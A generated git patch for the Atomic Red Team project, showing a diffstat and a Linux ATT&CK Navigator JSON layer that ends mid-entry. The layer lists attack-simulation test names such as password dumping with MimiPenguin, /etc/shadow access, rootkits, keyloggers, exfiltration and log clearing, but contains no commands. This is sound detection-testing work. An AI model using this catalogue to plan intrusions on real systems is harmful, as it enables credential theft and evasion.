From ad2d7c8f139aa44c6a4823e7ca0b4d7b664bd689 Mon Sep 17 00:00:00 2001 From: Atomic Red Team doc generator Date: Mon, 6 Nov 2023 22:42:54 +0000 Subject: [PATCH] Generated docs from job=generate-docs branch=master [ci skip] --- .../art-navigator-layer-linux.json | 2 +- atomics/Indexes/Indexes-CSV/linux-index.csv | 115 + atomics/Indexes/Indexes-Markdown/index.md | 454 +-- .../Indexes/Indexes-Markdown/linux-index.md | 337 +- .../Indexes/Indexes-Markdown/macos-index.md | 144 +- .../Indexes/Indexes-Markdown/windows-index.md | 6 +- atomics/Indexes/index.yaml | 391 +-- atomics/Indexes/linux-index.yaml | 2944 ++++++++++++++++- atomics/Indexes/macos-index.yaml | 122 +- atomics/Indexes/windows-index.yaml | 3 - atomics/T1003.007/T1003.007.md | 4 +- atomics/T1003.008/T1003.008.md | 8 +- atomics/T1007/T1007.md | 2 +- atomics/T1016/T1016.md | 2 +- atomics/T1018/T1018.md | 6 +- atomics/T1027.001/T1027.001.md | 4 +- atomics/T1027.004/T1027.004.md | 6 +- atomics/T1027/T1027.md | 2 +- atomics/T1030/T1030.md | 2 +- atomics/T1033/T1033.md | 2 +- atomics/T1036.003/T1036.003.md | 2 +- atomics/T1036.005/T1036.005.md | 2 +- atomics/T1036.006/T1036.006.md | 2 +- atomics/T1037.004/T1037.004.md | 2 +- atomics/T1040/T1040.md | 6 +- atomics/T1046/T1046.md | 2 +- atomics/T1048.002/T1048.002.md | 2 +- atomics/T1048.003/T1048.003.md | 6 +- atomics/T1048/T1048.md | 4 +- atomics/T1049/T1049.md | 2 +- atomics/T1053.002/T1053.002.md | 2 +- atomics/T1053.003/T1053.003.md | 4 +- atomics/T1056.001/T1056.001.md | 4 +- atomics/T1057/T1057.md | 2 +- atomics/T1059.004/T1059.004.md | 20 +- atomics/T1059.006/T1059.006.md | 8 +- atomics/T1069.001/T1069.001.md | 2 +- atomics/T1070.002/T1070.002.md | 10 +- atomics/T1070.003/T1070.003.md | 14 +- atomics/T1070.004/T1070.004.md | 6 +- atomics/T1070.006/T1070.006.md | 8 +- atomics/T1071.001/T1071.001.md | 2 +- atomics/T1074.001/T1074.001.md | 2 +- atomics/T1078.003/T1078.003.md | 6 +- atomics/T1082/T1082.md | 10 +- atomics/T1083/T1083.md | 4 +- atomics/T1087.001/T1087.001.md | 12 +- atomics/T1090.001/T1090.001.md | 2 +- atomics/T1090.003/T1090.003.md | 2 +- atomics/T1098.004/T1098.004.md | 2 +- atomics/T1105/T1105.md | 14 +- atomics/T1110.001/T1110.001.md | 2 +- atomics/T1110.004/T1110.004.md | 2 +- atomics/T1113/T1113.md | 4 +- atomics/T1124/T1124.md | 2 +- atomics/T1132.001/T1132.001.md | 2 +- atomics/T1135/T1135.md | 2 +- atomics/T1136.001/T1136.001.md | 4 +- atomics/T1140/T1140.md | 10 +- atomics/T1176/T1176.md | 6 +- atomics/T1201/T1201.md | 2 +- atomics/T1217/T1217.md | 4 +- atomics/T1222.002/T1222.002.md | 16 +- atomics/T1485/T1485.md | 2 +- atomics/T1486/T1486.md | 8 +- atomics/T1496/T1496.md | 2 +- atomics/T1497.001/T1497.001.md | 2 +- atomics/T1518.001/T1518.001.md | 2 +- atomics/T1529/T1529.md | 14 +- atomics/T1543.002/T1543.002.md | 2 +- atomics/T1546.004/T1546.004.md | 6 +- atomics/T1546.005/T1546.005.md | 4 +- atomics/T1548.001/T1548.001.md | 10 +- atomics/T1548.003/T1548.003.md | 6 +- atomics/T1552.001/T1552.001.md | 6 +- atomics/T1552.003/T1552.003.md | 2 +- atomics/T1552.004/T1552.004.md | 8 +- atomics/T1553.004/T1553.004.md | 2 +- atomics/T1556.003/T1556.003.md | 2 +- atomics/T1560.001/T1560.001.md | 6 +- atomics/T1560.002/T1560.002.md | 8 +- atomics/T1562.001/T1562.001.md | 4 +- atomics/T1562.003/T1562.003.md | 6 +- atomics/T1562.004/T1562.004.md | 4 +- atomics/T1562.006/T1562.006.md | 4 +- atomics/T1564.001/T1564.001.md | 2 +- atomics/T1571/T1571.md | 2 +- atomics/T1614.001/T1614.001.md | 4 +- 88 files changed, 3806 insertions(+), 1090 deletions(-) diff --git a/atomics/Indexes/Attack-Navigator-Layers/art-navigator-layer-linux.json b/atomics/Indexes/Attack-Navigator-Layers/art-navigator-layer-linux.json index b74a874384..72328781a6 100644 --- a/atomics/Indexes/Attack-Navigator-Layers/art-navigator-layer-linux.json +++ b/atomics/Indexes/Attack-Navigator-Layers/art-navigator-layer-linux.json @@ -1 +1 @@ -{"name":"Atomic Red Team (Linux)","versions":{"attack":"13","navigator":"4.8.2","layer":"4.4"},"description":"Atomic Red Team (Linux) MITRE ATT&CK Navigator Layer","domain":"enterprise-attack","filters":{"platforms":["Linux"]},"gradient":{"colors":["#ffffff","#ce232e"],"minValue":0,"maxValue":10},"legendItems":[{"label":"10 or more tests","color":"#ce232e"},{"label":"1 or more tests","color":"#ffffff"}],"techniques":[{"techniqueID":"T1003","score":7,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1003/T1003.md"}]},{"techniqueID":"T1003.007","score":3,"enabled":true,"comment":"\n- Dump individual process memory with sh (Local)\n- Dump individual process memory with Python (Local)\n- Capture Passwords with MimiPenguin\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1003.007/T1003.007.md"}]},{"techniqueID":"T1003.008","score":4,"enabled":true,"comment":"\n- Access /etc/shadow (Local)\n- Access /etc/passwd (Local)\n- Access /etc/{shadow,passwd,master.passwd} with a standard bin that's not cat\n- Access /etc/{shadow,passwd,master.passwd} with shell builtins\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1003.008/T1003.008.md"}]},{"techniqueID":"T1007","score":1,"enabled":true,"comment":"\n- System Service Discovery - systemctl\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1007/T1007.md"}]},{"techniqueID":"T1014","score":4,"enabled":true,"comment":"\n- Loadable Kernel Module based Rootkit\n- Loadable Kernel Module based Rootkit\n- dynamic-linker based rootkit (libprocesshider)\n- Loadable Kernel Module based Rootkit (Diamorphine)\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1014/T1014.md"}]},{"techniqueID":"T1016","score":1,"enabled":true,"comment":"\n- System Network Configuration Discovery\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1016/T1016.md"}]},{"techniqueID":"T1018","score":5,"enabled":true,"comment":"\n- Remote System Discovery - arp nix\n- Remote System Discovery - sweep\n- Remote System Discovery - ip neighbour\n- Remote System Discovery - ip route\n- Remote System Discovery - ip tcp_metrics\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1018/T1018.md"}]},{"techniqueID":"T1027","score":8,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1027/T1027.md"}],"comment":"\n- Decode base64 Data into Script\n"},{"techniqueID":"T1027.001","score":2,"enabled":true,"comment":"\n- Pad Binary to Change Hash - Linux/macOS dd\n- Pad Binary to Change Hash using truncate command - Linux/macOS\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1027.001/T1027.001.md"}]},{"techniqueID":"T1027.002","score":2,"enabled":true,"comment":"\n- Binary simply packed by UPX (linux)\n- Binary packed by UPX, with modified headers (linux)\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1027.002/T1027.002.md"}]},{"techniqueID":"T1027.004","score":3,"enabled":true,"comment":"\n- C compile\n- CC compile\n- Go compile\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1027.004/T1027.004.md"}]},{"techniqueID":"T1030","score":1,"enabled":true,"comment":"\n- Data Transfer Size Limits\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1030/T1030.md"}]},{"techniqueID":"T1033","score":1,"enabled":true,"comment":"\n- System Owner/User Discovery\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1033/T1033.md"}]},{"techniqueID":"T1036","score":4,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1036/T1036.md"}]},{"techniqueID":"T1036.003","score":1,"enabled":true,"comment":"\n- Masquerading as FreeBSD or Linux crond process.\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1036.003/T1036.003.md"}]},{"techniqueID":"T1036.004","score":1,"enabled":true,"comment":"\n- linux rename /proc/pid/comm using prctl\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1036.004/T1036.004.md"}]},{"techniqueID":"T1036.005","score":1,"enabled":true,"comment":"\n- Execute a process from a directory masquerading as the current parent directory.\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1036.005/T1036.005.md"}]},{"techniqueID":"T1036.006","score":1,"enabled":true,"comment":"\n- Space After Filename\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1036.006/T1036.006.md"}]},{"techniqueID":"T1037","score":2,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1037/T1037.md"}]},{"techniqueID":"T1037.004","score":2,"enabled":true,"comment":"\n- rc.common\n- rc.local\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1037.004/T1037.004.md"}]},{"techniqueID":"T1040","score":5,"enabled":true,"comment":"\n- Packet Capture Linux using tshark or tcpdump\n- Packet Capture Linux socket AF_PACKET,SOCK_RAW with sudo\n- Packet Capture Linux socket AF_INET,SOCK_RAW,TCP with sudo\n- Packet Capture Linux socket AF_INET,SOCK_PACKET,UDP with sudo\n- Packet Capture Linux socket AF_PACKET,SOCK_RAW with BPF filter for UDP with sudo\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1040/T1040.md"}]},{"techniqueID":"T1046","score":2,"enabled":true,"comment":"\n- Port Scan\n- Port Scan Nmap\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1046/T1046.md"}]},{"techniqueID":"T1048","score":6,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1048/T1048.md"}],"comment":"\n- Exfiltration Over Alternative Protocol - SSH\n- Exfiltration Over Alternative Protocol - SSH\n"},{"techniqueID":"T1048.002","score":1,"enabled":true,"comment":"\n- Exfiltrate data HTTPS using curl freebsd,linux or macos\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1048.002/T1048.002.md"}]},{"techniqueID":"T1048.003","score":3,"enabled":true,"comment":"\n- Exfiltration Over Alternative Protocol - HTTP\n- Exfiltration Over Alternative Protocol - DNS\n- Python3 http.server\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1048.003/T1048.003.md"}]},{"techniqueID":"T1049","score":1,"enabled":true,"comment":"\n- System Network Connections Discovery FreeBSD, Linux & MacOS\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1049/T1049.md"}]},{"techniqueID":"T1053","score":7,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1053/T1053.md"}]},{"techniqueID":"T1053.002","score":1,"enabled":true,"comment":"\n- At - Schedule a job\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1053.002/T1053.002.md"}]},{"techniqueID":"T1053.003","score":3,"enabled":true,"comment":"\n- Cron - Replace crontab with referenced file\n- Cron - Add script to all cron subfolders\n- Cron - Add script to /var/spool/cron/crontabs/ folder\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1053.003/T1053.003.md"}]},{"techniqueID":"T1053.006","score":3,"enabled":true,"comment":"\n- Create Systemd Service and Timer\n- Create a user level transient systemd service and timer\n- Create a system level transient systemd service and timer\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1053.006/T1053.006.md"}]},{"techniqueID":"T1056","score":5,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1056/T1056.md"}]},{"techniqueID":"T1056.001","score":5,"enabled":true,"comment":"\n- Living off the land Terminal Input Capture on Linux with pam.d\n- Logging bash history to syslog\n- Bash session based keylogger\n- SSHD PAM keylogger\n- Auditd keylogger\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1056.001/T1056.001.md"}]},{"techniqueID":"T1057","score":1,"enabled":true,"comment":"\n- Process Discovery - ps\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1057/T1057.md"}]},{"techniqueID":"T1059","score":17,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1059/T1059.md"}]},{"techniqueID":"T1059.004","score":13,"enabled":true,"comment":"\n- Create and Execute Bash Shell Script\n- Command-Line Interface\n- Harvest SUID executable files\n- LinEnum tool execution\n- New script file in the tmp directory\n- What shell is running\n- What shells are available\n- Command line scripts\n- Obfuscated command line scripts\n- Change login shell\n- Environment variable scripts\n- Detecting pipe-to-shell\n- Current kernel information enumeration\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1059.004/T1059.004.md"}]},{"techniqueID":"T1059.006","score":4,"enabled":true,"comment":"\n- Execute shell script via python's command mode arguement\n- Execute Python via scripts\n- Execute Python via Python executables\n- Python pty module and spawn function used to spawn sh or bash\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1059.006/T1059.006.md"}]},{"techniqueID":"T1069","score":2,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1069/T1069.md"}]},{"techniqueID":"T1069.001","score":1,"enabled":true,"comment":"\n- Permission Groups Discovery (Local)\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1069.001/T1069.001.md"}]},{"techniqueID":"T1069.002","score":1,"enabled":true,"comment":"\n- Active Directory Domain Search Using LDAP - Linux (Ubuntu)/macOS\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1069.002/T1069.002.md"}]},{"techniqueID":"T1070","score":23,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1070/T1070.md"}]},{"techniqueID":"T1070.002","score":4,"enabled":true,"comment":"\n- rm -rf\n- Delete system journal logs via rm and journalctl utilities\n- Overwrite Linux Mail Spool\n- Overwrite Linux Log\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1070.002/T1070.002.md"}]},{"techniqueID":"T1070.003","score":9,"enabled":true,"comment":"\n- Clear Bash history (rm)\n- Clear Bash history (echo)\n- Clear Bash history (cat dev/null)\n- Clear Bash history (ln dev/null)\n- Clear Bash history (truncate)\n- Clear history of a bunch of shells\n- Clear and Disable Bash History Logging\n- Use Space Before Command to Avoid Logging to History\n- Disable Bash History Logging with SSH -T\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1070.003/T1070.003.md"}]},{"techniqueID":"T1070.004","score":4,"enabled":true,"comment":"\n- Delete a single file - FreeBSD/Linux/macOS\n- Delete an entire folder - FreeBSD/Linux/macOS\n- Overwrite and delete a file with shred\n- Delete Filesystem - Linux\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1070.004/T1070.004.md"}]},{"techniqueID":"T1070.006","score":4,"enabled":true,"comment":"\n- Set a file's access timestamp\n- Set a file's modification timestamp\n- Set a file's creation timestamp\n- Modify file timestamps using reference file\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1070.006/T1070.006.md"}]},{"techniqueID":"T1070.008","score":2,"enabled":true,"comment":"\n- Copy and Delete Mailbox Data on Linux\n- Copy and Modify Mailbox Data on Linux\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1070.008/T1070.008.md"}]},{"techniqueID":"T1071","score":1,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1071/T1071.md"}]},{"techniqueID":"T1071.001","score":1,"enabled":true,"comment":"\n- Malicious User Agents - Nix\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1071.001/T1071.001.md"}]},{"techniqueID":"T1074","score":1,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1074/T1074.md"}]},{"techniqueID":"T1074.001","score":1,"enabled":true,"comment":"\n- Stage data from Discovery.sh\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1074.001/T1074.001.md"}]},{"techniqueID":"T1078","score":3,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1078/T1078.md"}]},{"techniqueID":"T1078.003","score":3,"enabled":true,"comment":"\n- Create local account (Linux)\n- Reactivate a locked/expired account (Linux)\n- Login as nobody (Linux)\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1078.003/T1078.003.md"}]},{"techniqueID":"T1082","score":6,"enabled":true,"comment":"\n- List OS Information\n- Linux VM Check via Hardware\n- Linux VM Check via Kernel Modules\n- Hostname Discovery\n- Environment variables discovery on freebsd, macos and linux\n- Linux List Kernel Modules\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1082/T1082.md"}]},{"techniqueID":"T1083","score":2,"enabled":true,"comment":"\n- Nix File and Directory Discovery\n- Nix File and Directory Discovery 2\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1083/T1083.md"}]},{"techniqueID":"T1087","score":7,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1087/T1087.md"}]},{"techniqueID":"T1087.001","score":6,"enabled":true,"comment":"\n- Enumerate all accounts (Local)\n- View sudoers access\n- View accounts with UID 0\n- List opened files by user\n- Show if a user account has ever logged in remotely\n- Enumerate users and groups\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1087.001/T1087.001.md"}]},{"techniqueID":"T1087.002","score":1,"enabled":true,"comment":"\n- Active Directory Domain Search\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1087.002/T1087.002.md"}]},{"techniqueID":"T1090","score":2,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1090/T1090.md"}]},{"techniqueID":"T1090.001","score":1,"enabled":true,"comment":"\n- Connection Proxy\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1090.001/T1090.001.md"}]},{"techniqueID":"T1090.003","score":1,"enabled":true,"comment":"\n- Tor Proxy Usage - Debian/Ubuntu\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1090.003/T1090.003.md"}]},{"techniqueID":"T1098","score":1,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1098/T1098.md"}]},{"techniqueID":"T1098.004","score":1,"enabled":true,"comment":"\n- Modify SSH Authorized Keys\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1098.004/T1098.004.md"}]},{"techniqueID":"T1105","score":8,"enabled":true,"comment":"\n- rsync remote file copy (push)\n- rsync remote file copy (pull)\n- scp remote file copy (push)\n- scp remote file copy (pull)\n- sftp remote file copy (push)\n- sftp remote file copy (pull)\n- whois file download\n- Linux Download File and Run\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1105/T1105.md"}]},{"techniqueID":"T1110","score":3,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1110/T1110.md"}]},{"techniqueID":"T1110.001","score":2,"enabled":true,"comment":"\n- SUDO Brute Force - Debian\n- SUDO Brute Force - Redhat\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1110.001/T1110.001.md"}]},{"techniqueID":"T1110.004","score":1,"enabled":true,"comment":"\n- SSH Credential Stuffing From Linux\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1110.004/T1110.004.md"}]},{"techniqueID":"T1113","score":2,"enabled":true,"comment":"\n- X Windows Capture\n- Capture Linux Desktop using Import Tool\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1113/T1113.md"}]},{"techniqueID":"T1115","score":1,"enabled":true,"comment":"\n- Add or copy content to clipboard with xClip\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1115/T1115.md"}]},{"techniqueID":"T1132","score":1,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1132/T1132.md"}]},{"techniqueID":"T1132.001","score":1,"enabled":true,"comment":"\n- Base64 Encoded data.\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1132.001/T1132.001.md"}]},{"techniqueID":"T1135","score":1,"enabled":true,"comment":"\n- Network Share Discovery - linux\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1135/T1135.md"}]},{"techniqueID":"T1136","score":4,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1136/T1136.md"}]},{"techniqueID":"T1136.001","score":2,"enabled":true,"comment":"\n- Create a user account on a Linux system\n- Create a new user in Linux with `root` UID and GID.\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1136.001/T1136.001.md"}]},{"techniqueID":"T1136.002","score":2,"enabled":true,"comment":"\n- Active Directory Create Admin Account\n- Active Directory Create User Account (Non-elevated)\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1136.002/T1136.002.md"}]},{"techniqueID":"T1140","score":6,"enabled":true,"comment":"\n- Base64 decoding with Python\n- Base64 decoding with Perl\n- Base64 decoding with shell utilities\n- Hex decoding with shell utilities\n- Linux Base64 Encoded Shebang in CLI\n- XOR decoding and command execution using Python\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1140/T1140.md"}]},{"techniqueID":"T1176","score":3,"enabled":true,"comment":"\n- Chrome/Chromium (Developer Mode)\n- Chrome/Chromium (Chrome Web Store)\n- Firefox\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1176/T1176.md"}]},{"techniqueID":"T1201","score":4,"enabled":true,"comment":"\n- Examine password complexity policy - Ubuntu\n- Examine password complexity policy - CentOS/RHEL 7.x\n- Examine password complexity policy - CentOS/RHEL 6.x\n- Examine password expiration policy - All Linux\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1201/T1201.md"}]},{"techniqueID":"T1217","score":1,"enabled":true,"comment":"\n- List Mozilla Firefox Bookmark Database Files on FreeBSD/Linux\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1217/T1217.md"}]},{"techniqueID":"T1222","score":11,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1222/T1222.md"}]},{"techniqueID":"T1222.002","score":11,"enabled":true,"comment":"\n- chmod - Change file or folder mode (numeric mode)\n- chmod - Change file or folder mode (symbolic mode)\n- chmod - Change file or folder mode (numeric mode) recursively\n- chmod - Change file or folder mode (symbolic mode) recursively\n- chown - Change file or folder ownership and group\n- chown - Change file or folder ownership and group recursively\n- chown - Change file or folder mode ownership only\n- chown - Change file or folder ownership recursively\n- chattr - Remove immutable file attribute\n- Chmod through c script\n- Chown through c script\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1222.002/T1222.002.md"}]},{"techniqueID":"T1485","score":1,"enabled":true,"comment":"\n- FreeBSD/macOS/Linux - Overwrite file with DD\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1485/T1485.md"}]},{"techniqueID":"T1486","score":4,"enabled":true,"comment":"\n- Encrypt files using gpg (FreeBSD/Linux)\n- Encrypt files using 7z (FreeBSD/Linux)\n- Encrypt files using ccrypt (FreeBSD/Linux)\n- Encrypt files using openssl (FreeBSD/Linux)\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1486/T1486.md"}]},{"techniqueID":"T1496","score":1,"enabled":true,"comment":"\n- FreeBSD/macOS/Linux - Simulate CPU Load with Yes\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1496/T1496.md"}]},{"techniqueID":"T1497","score":1,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1497/T1497.md"}]},{"techniqueID":"T1497.001","score":1,"enabled":true,"comment":"\n- Detect Virtualization Environment (Linux)\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1497.001/T1497.001.md"}]},{"techniqueID":"T1518","score":1,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1518/T1518.md"}]},{"techniqueID":"T1518.001","score":1,"enabled":true,"comment":"\n- Security Software Discovery - ps (Linux)\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1518.001/T1518.001.md"}]},{"techniqueID":"T1529","score":7,"enabled":true,"comment":"\n- Restart System via `shutdown` - FreeBSD/macOS/Linux\n- Shutdown System via `shutdown` - FreeBSD/macOS/Linux\n- Restart System via `reboot` - FreeBSD/macOS/Linux\n- Shutdown System via `halt` - FreeBSD/Linux\n- Reboot System via `halt` - Linux\n- Shutdown System via `poweroff` - FreeBSD/Linux\n- Reboot System via `poweroff` - Linux\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1529/T1529.md"}]},{"techniqueID":"T1531","score":1,"enabled":true,"comment":"\n- Change User Password via passwd\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1531/T1531.md"}]},{"techniqueID":"T1543","score":2,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1543/T1543.md"}]},{"techniqueID":"T1543.002","score":2,"enabled":true,"comment":"\n- Create Systemd Service\n- Create Systemd Service file, Enable the service , Modify and Reload the service.\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1543.002/T1543.002.md"}]},{"techniqueID":"T1546","score":8,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1546/T1546.md"}]},{"techniqueID":"T1546.004","score":6,"enabled":true,"comment":"\n- Add command to .bash_profile\n- Add command to .bashrc\n- Append to the system shell profile\n- Append commands user shell profile\n- System shell profile scripts\n- Create/Append to .bash_logout\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1546.004/T1546.004.md"}]},{"techniqueID":"T1546.005","score":2,"enabled":true,"comment":"\n- Trap EXIT\n- Trap SIGINT\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1546.005/T1546.005.md"}]},{"techniqueID":"T1547","score":1,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1547/T1547.md"}]},{"techniqueID":"T1547.006","score":1,"enabled":true,"comment":"\n- Linux - Load Kernel Module via insmod\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1547.006/T1547.006.md"}]},{"techniqueID":"T1548","score":10,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1548/T1548.md"}]},{"techniqueID":"T1548.001","score":7,"enabled":true,"comment":"\n- Make and modify binary from C source\n- Set a SetUID flag on file\n- Set a SetGID flag on file\n- Make and modify capabilities of a 